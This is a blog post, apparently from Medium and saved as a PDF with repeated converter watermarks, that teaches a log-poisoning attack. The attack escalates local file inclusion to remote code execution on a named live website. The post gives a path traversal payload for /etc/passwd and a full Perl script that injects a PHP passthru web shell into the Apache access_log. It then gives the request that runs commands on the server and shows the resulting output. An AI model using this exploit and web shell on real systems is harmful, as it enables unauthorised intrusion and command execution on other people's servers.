LFI to RCE via access_log injection

NoGe Follow
Jun 6, 2017 · 2 min read

Hi guys

Just wanna share a trick from Local File Inclusion/File Path Traversal to
Remote Code Execution by injecting the access_log.

I have a target http://proqualitycontrol.com/index.php?page=aboutus

and it’s vulnerable to LFI/FPT. It’s a live website. Inject the target with
../../../../../../../../../../../../../../../etc/passwd%00 payload.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Now change with /etc/httpd/conf/httpd.conf. Not all httpd.conf path is
here. To nd the access_log location you need to nd httpd.conf rst.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 View source (ctrl+u) for a better view of their httpd.conf.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Open the le called access_log. In this case
/home/pro_99/proqualitycontrol.com/access_log.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 My friend @paceander coded this perl script to inject the access_log.

#!/usr/bin/perl -w

use IO::Socket::INET;

my $host = $ARGV[0];
my $port = $ARGV[1];

print “*** Injecting $host:$port access log…\n”;

my $rce = “<?if(get_magic_quotes_gpc()){
\$_GET[cmd]=stripslashes(\$_GET[cmd]);} passthru(\$_GET[cmd]);?
>”;
$sock = IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port,
Proto=>”tcp”) || die “Cant connect to $host:$port!\n”;
print $sock “GET /v0pcr3w “.$rce.” HTTP/1.1\r\n”;
print $sock “Host: “.$host.”\r\n”;
print $sock “Connection: close\r\n\r\n”;
close($sock);

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 print “*** Done!\n\n”;

Or you can download it here

Run it “perl log.pl <target> 80”

Open the access_log again and search for v0pcr3w. If the word is there then
we’ve successfully injected the access_log.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Now run this line to execute command on server
/home/pro_99/proqualitycontrol.com/access_log%00&cmd=id and
you’ll see the “id” command executed.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Our command executed successfully GET /v0pcr3w uid=48(apache)
gid=48(apache) groups=48(apache),500(webadmin).

Note: The web administrator has been noti ed about this vulnerability.

Thats all guys, happy hacking!

Bug Bounty Rce Injection Tutorial Vulnerability

406 claps

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 WRITTEN BY

NoGe Follow

researcher | #mufc

See responses (3)

More From Medium

Also tagged Vulnerability

An Open Letter To Those Who Feel Like They

Have To Hold It Together 24/7
Megan Minutillo in P.S. I Love You
Oct 10 · 2 min read 44

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Related reads

Chinese Hackers Back Beijing’s Authoritarian

Pals
Foreign Policy in Foreign Policy
Jul 30, 2018 · 7 min read 97

Related reads

Clobbering the clobbered — Advanced DOM

Clobbering
terjanq
S 26 9 i d 47
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Sep 26 · 9 min read 47

Discover Medium Make Medium yours Become a member

Welcome to a place where words matter. Follow all the topics you care about, and Get unlimited access to the best stories on
On Medium, smart voices and original we’ll deliver the best stories for you to your Medium — and support writers while
ideas take center stage - with no ads in homepage and inbox. Explore you’re at it. Just $5/month. Upgrade
sight. Watch

About Help Legal

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD